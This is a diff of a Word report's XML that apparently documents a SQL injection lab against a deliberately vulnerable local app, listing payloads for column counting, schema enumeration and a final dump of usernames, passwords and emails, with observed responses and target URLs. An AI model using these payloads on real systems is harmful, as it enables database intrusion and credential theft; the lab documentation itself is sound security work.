+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ' ORDER BY 3 -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Observed database response: Information Security</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:05.579Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/vulnerable/courses?q=%27+ORDER+BY+3+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3547,7 +3769,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="3394225C">
+        <w:pict w14:anchorId="780FEC8A">
           <v:shape id="_x0000_i1038" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId17" o:title=""/>
           </v:shape>
@@ -3576,7 +3798,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 18 of 41</w:t>
+        <w:t>Page 19 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3612,104 +3834,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Sqli Advanced Database</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT 'DATABASE',name,file FROM pragma_database_list -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Observed database response: main</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:39.144Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/vulnerable/courses?q=%27+UNION+SELECT+%27DATABASE%27%2Cname%2Cfile+FROM+pragma_database_list+--+</w:t>
+        <w:t>Vulnerable Version Sql Injection Advanced Columns Four</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ' ORDER BY 4 -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Observed database response: ORDER BY</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:06.193Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/vulnerable/courses?q=%27+ORDER+BY+4+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3734,8 +3955,8 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="54F6FFF5">
-          <v:shape id="_x0000_i1039" type="#_x0000_t75" style="width:495pt;height:361.5pt">
+        <w:pict w14:anchorId="15F24F5D">
+          <v:shape id="_x0000_i1039" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId18" o:title=""/>
           </v:shape>
         </w:pict>
@@ -3763,7 +3984,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 19 of 41</w:t>
+        <w:t>Page 20 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3799,104 +4020,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Sqli Advanced Tables</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT 'TABLE',name,sql FROM sqlite_master WHERE type='table' -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Observed database response: CREATE TABLE users</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:39.709Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/vulnerable/courses?q=%27+UNION+SELECT+%27TABLE%27%2Cname%2Csql+FROM+sqlite_master+WHERE+type%3D%27table%27+--+</w:t>
+        <w:t>Vulnerable Version Sql Injection Advanced Database</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT 'DATABASE',name,file FROM pragma_database_list -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Observed database response: main</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:06.836Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/vulnerable/courses?q=%27+UNION+SELECT+%27DATABASE%27%2Cname%2Cfile+FROM+pragma_database_list+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3921,8 +4141,8 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="22C6405C">
-          <v:shape id="_x0000_i1040" type="#_x0000_t75" style="width:427.5pt;height:395.25pt">
+        <w:pict w14:anchorId="0BDB658D">
+          <v:shape id="_x0000_i1040" type="#_x0000_t75" style="width:495pt;height:361.5pt">
             <v:imagedata r:id="rId19" o:title=""/>
           </v:shape>
         </w:pict>
@@ -3950,7 +4170,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 20 of 41</w:t>
+        <w:t>Page 21 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3986,113 +4206,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Sqli Advanced Columns</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT 'COLUMN',name,type FROM pragma_table_info('users') -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Observed database response: password</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:40.270Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>//localhost:8000/vulnerable/courses?q=%27+UNION+SELECT+%27COLUMN%27%2Cname%2Ctype+FROM+pragma_table_info%28%27users%27%29+--+</w:t>
+        <w:t>Vulnerable Version Sql Injection Advanced Tables</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT 'TABLE',name,sql FROM sqlite_master WHERE type='table' -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Observed database response: CREATE TABLE users</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:07.491Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/vulnerable/courses?q=%27+UNION+SELECT+%27TABLE%27%2Cname%2Csql+FROM+sqlite_master+WHERE+type%3D%27table%27+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4117,8 +4327,8 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="2A9FC18B">
-          <v:shape id="_x0000_i1041" type="#_x0000_t75" style="width:388.5pt;height:395.25pt">
+        <w:pict w14:anchorId="7AD37FA0">
+          <v:shape id="_x0000_i1041" type="#_x0000_t75" style="width:427.5pt;height:395.25pt">
             <v:imagedata r:id="rId20" o:title=""/>
           </v:shape>
         </w:pict>
@@ -4146,7 +4356,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 21 of 41</w:t>
+        <w:t>Page 22 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4182,104 +4392,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Sqli Advanced Credentials</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT username,password,email FROM users -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
